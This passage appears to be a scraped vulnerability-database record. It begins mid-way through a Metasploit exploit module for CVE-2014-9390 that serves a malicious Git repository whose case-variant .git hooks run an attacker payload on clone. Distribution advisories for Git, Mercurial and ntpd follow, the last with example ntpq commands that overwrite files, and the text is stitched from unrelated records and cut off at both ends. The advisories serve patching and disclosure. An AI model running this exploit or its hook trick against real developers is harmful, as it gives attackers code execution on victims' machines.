'http://article.gmane.org/gmane.linux.kernel/1853266'], ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'], ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'], ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'], ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'], ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a'] ], 'DisclosureDate' => 'Dec 18 2014', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp perl bash' } } } ], [ 'Windows Powershell', { 'Platform' => [ 'windows' ], 'Arch' => [ARCH_X86, ARCH_X86_64] } ] ], 'DefaultTarget' => 0)) register_options( [ OptBool.new('GIT', [true, 'Exploit Git clients', true]) ] ) register_advanced_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']), OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']), OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false]) ] ) end def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } } unless datastore['GIT'] || datastore['MERCURIAL'] fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL') end setup_git setup_mercurial super end def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end # In .git/hooks/ directory, specially named files are shell scripts that # are executed when particular events occur. For example, if # .git/hooks/post-checkout was an executable shell script, a git client # would execute that file every time anything is checked out. There are # various other files that can be used to achieve similar goals but related # to committing, updating, etc. # # This builds a fake git repository using the knowledge from: # # http://schacon.github.io/gitbook/7_how_git_stores_objects.html # http://schacon.github.io/gitbook/7_browsing_git_objects.html case target.name when 'Automatic' full_cmd = "#!/bin/sh\n#{payload.encoded}\n" when 'Windows Powershell' psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true) full_cmd = "#!/bin/sh\n#{psh}" end sha1, content = build_object('blob', full_cmd) trigger = "/objects/#{get_path(sha1)}" @repo_data[:git][:trigger] = trigger @repo_data[:git][:files][trigger] = content # build tree that points to the blob sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the hooks directory in which the hook lives, called hooks sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the partially uppercased .git directory in # which hooks live variants = [] %w(g G). each do |g| %w(i I).each do |i| %w(t T).each do |t| git = g + i + t variants << git unless git.chars.none? { |c| c == c.upcase } end end end git_dir = '.' + variants.sample sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build the supposed commit that dropped this file, which has a random user/company email = Rex::Text.rand_mail_address first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten full_name = "#{first.capitalize} #{last.capitalize}" tstamp = Time.now.to_i author_time = rand(tstamp) commit_time = rand(author_time) tz_off = rand(10) commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ "\n" \ "Initial commit to open git repository for #{company}!\n" if datastore['VERBOSE'] vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:") commit.each_line { |l| vprint_status(l.strip) } end sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build HEAD @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" # lastly, build refs @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" end def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo") # TODO: finish building the fake repository end # Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end # Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end def exploit super end def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML <html> <head><title>Public Repositories</title></head> <body> <p>Here are our public repositories:</p> <ul> HTML if datastore['GIT'] this_git_uri = URI.parse(get_uri).merge(git_uri) resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>" else resp.body << "<li><a>Git</a> (currently offline)</li>" end if datastore['MERCURIAL'] this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri) resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>" else resp.body << "<li><a>Mercurial</a> (currently offline)</li>" end resp.body << <<HTML </ul> </body> </html> HTML cli.send_response(resp) end # simulates a Mercurial HTTP server def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so uri = URI.parse(req.uri) req_path = uri.path req_path += "?#{uri.query}" if uri.query req_path.gsub!(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_path) vprint_status("Sending Mercurial #{req_path}") send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') if req_path == @repo_data[:mercurial][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Mercurial #{req_path} doesn't exist") send_not_found(cli) end end # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI def mercurial_uri return @mercurial_uri if @mercurial_uri if datastore['MERCURIAL_URI'].blank? @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase else @mercurial_uri = datastore['MERCURIAL_URI'] end end end . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201612-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mercurial: Multiple vulnerabilities Date: December 07, 2016 Bugs: #533008, #544332, #578546, #582238 ID: 201612-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mercurial, the worst of which could lead to the remote execution of arbitrary code. Background ========== Mercurial is a distributed source control management system. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-vcs/mercurial < 3.8.4 >= 3.8.4 Description =========== Multiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process. Workaround ========== There is no known workaround at this time. Resolution ========== All mercurial users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4" References ========== [ 1 ] CVE-2014-9390 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390 [ 2 ] CVE-2014-9462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462 [ 3 ] CVE-2016-3068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068 [ 4 ] CVE-2016-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069 [ 5 ] CVE-2016-3105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105 [ 6 ] CVE-2016-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201612-19 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2015:169 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : git Date : March 30, 2015 Affected: Business Server 2.0 _______________________________________________________________________ Problem Description: Updated git packages fix security vulnerability: It was reported that git, when used as a client on a case-insensitive filesystem, could allow the overwrite of the .git/config file when the client performed a git pull. Because git permitted committing .Git/config (or any case variation), on the pull this would replace the user&#039;s .git/config. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390 http://advisories.mageia.org/MGASA-2014-0546.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX AknCsk/2slzIzxNpACLxeDI= =Vdej -----END PGP SIGNATURE----- . Content-Disposition: inline ==========================================================================Ubuntu Security Notice USN-2470-1 January 14, 2015 git vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.10 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Git could be made to run programs as your login if it received specially crafted changes from a remote repository. Software Description: - git: fast, scalable, distributed revision control system Details: Matt Mackall and Augie Fackler discovered that Git incorrectly handled certain filesystem paths. The remote attacker would need write access to a Git repository that the victim pulls from. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.10: git 1:2.1.0-1ubuntu0.1 Ubuntu 14.04 LTS: git 1:1.9.1-1ubuntu0.1 Ubuntu 12.04 LTS: git 1:1.7.9.5-1ubuntu0.1 After a standard system update you need to set the core.protectHFS and/or core.protectNTFS Git configuration variables to "true" if you store Git trees in HFS+ and/or NTFS filesystems. If you host Git trees, setting the core.protectHFS, core.protectNTFS, and receive.fsckObjects Git configuration variables to "true" will cause your Git server to reject objects containing malicious paths intended to overwrite the Git metadata. References: http://www.ubuntu.com/usn/usn-2470-1 CVE-2014-9390 Package Information: https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1
VAR-201510-0705 CVE-2014-9750 NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
ntp_crypto.c in ntpd in NTP 4.x before 4.2.8p1, when Autokey Authentication is enabled, allows remote attackers to obtain sensitive information from process memory or cause a denial of service (daemon crash) via a packet containing an extension field with an invalid value for the length of its value field. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. ( Daemon crash ) There is a possibility of being put into a state. NTP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 ===================================================================== 1. Summary: Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64 3. Description: The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service. It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751) A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799) A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405) A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. (CVE-2014-9297, CVE-2014-9750) It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798) The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat. Bug fixes: * The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111) * The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014) * Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116) * The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640) Enhancements: * This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828) * This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154) * Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702) All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. slew [PATCH] 1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto 1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks 1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems 6. Package List: Red Hat Enterprise Linux Client (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: ntp-4.2.6p5-22.el7.src.rpm x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted package to cause ntpd to crash if: * ntpd enabled remote configuration * The attacker had the knowledge of the configuration password * The attacker had access to a computer entrusted to perform remote configuration Note that remote configuration is disabled by default in NTP. CVE-2015-5194 It was found that ntpd could crash due to an uninitialized variable when processing malformed logconfig configuration commands. CVE-2015-5195 It was found that ntpd exits with a segmentation fault when a statistics type that was not enabled during compilation (e.g. timingstats) is referenced by the statistics or filegen configuration command CVE-2015-5219 It was discovered that sntp program would hang in an infinite loop when a crafted NTP packet was received, related to the conversion of the precision value in the packet to double. CVE-2015-5300 It was found that ntpd did not correctly implement the -g option: Normally, ntpd exits with a message to the system log if the offset exceeds the panic threshold, which is 1000 s by default. This option allows the time to be set to any value without restriction; however, this can happen only once. If the threshold is exceeded after that, ntpd will exit with a message to the system log. This option can be used with the -q and -x options. ntpd could actually step the clock multiple times by more than the panic threshold if its clock discipline doesn't have enough time to reach the sync state and stay there for at least one update. If a man-in-the-middle attacker can control the NTP traffic since ntpd was started (or maybe up to 15-30 minutes after that), they can prevent the client from reaching the sync state and force it to step its clock by any amount any number of times, which can be used by attackers to expire certificates, etc. This is contrary to what the documentation says. Normally, the assumption is that an MITM attacker can step the clock more than the panic threshold only once when ntpd starts and to make a larger adjustment the attacker has to divide it into multiple smaller steps, each taking 15 minutes, which is slow. CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 It was found that the fix for CVE-2014-9750 was incomplete: three issues were found in the value length checks in ntp_crypto.c, where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. CVE-2015-7701 A memory leak flaw was found in ntpd's CRYPTO_ASSOC. CVE-2015-7703 Miroslav Lichvar of Red Hat found that the :config command can be used to set the pidfile and driftfile paths without any restrictions. A remote attacker could use this flaw to overwrite a file on the file system with a file containing the pid of the ntpd process (immediately) or the current estimated drift of the system clock (in hourly intervals). For example: ntpq -c ':config pidfile /tmp/ntp.pid' ntpq -c ':config driftfile /tmp/ntp.drift' In Debian ntpd is configured to drop root privileges, which limits the impact of this issue. CVE-2015-7704 If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet from the server to reduce its polling rate, it doesn't check if the originate timestamp in the reply matches the transmit timestamp from its request. An off-path attacker can send a crafted KoD packet to the client, which will increase the client's polling interval to a large value and effectively disable synchronization with the server. CVE-2015-7850 An exploitable denial of service vulnerability exists in the remote configuration functionality of the Network Time Protocol. A specially crafted configuration file could cause an endless loop resulting in a denial of service. An attacker could provide a the malicious configuration file to trigger this vulnerability. CVE-2015-7852 A potential off by one vulnerability exists in the cookedprint functionality of ntpq. A specially crafted buffer could cause a buffer overflow potentially resulting in null byte being written out of bounds. CVE-2015-7855 It was found that NTP's decodenetnum() would abort with an assertion failure when processing a mode 6 or mode 7 packet containing an unusually long data value where a network address was expected. This could allow an authenticated attacker to crash ntpd. CVE-2015-7871 An error handling logic error exists within ntpd that manifests due to improper error condition handling associated with certain crypto-NAK packets. An unauthenticated, off-path attacker can force ntpd processes on targeted servers to peer with time sources of the attacker's choosing by transmitting symmetric active crypto-NAK packets to ntpd. This attack bypasses the authentication typically required to establish a peer association and allows an attacker to make arbitrary changes to system time. For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6. For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1. For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3. For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3. We recommend that you upgrade your ntp packages. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and 